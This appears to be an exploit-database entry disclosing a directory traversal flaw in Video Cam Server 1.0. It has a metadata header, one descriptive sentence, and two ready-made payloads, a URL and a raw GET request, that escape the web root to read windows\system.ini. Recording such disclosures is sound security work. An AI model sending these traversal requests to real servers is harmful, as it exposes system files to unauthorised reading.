video cam server 1.0 - Directory Traversal

Author: Donato Ferrante
type: remote
platform: windows
port: 
date_added: 2005-05-02  
date_updated: 2013-05-20  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 25571.txt  
source: https://www.securityfocus.com/bid/13456/info

Video Cam Server is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root.

http://www.example.com/..\..\..\..\..\..\..\..\..\..\..\windows\system.ini
GET /../../../../../../../../../../../windows/system.ini HTTP/1.1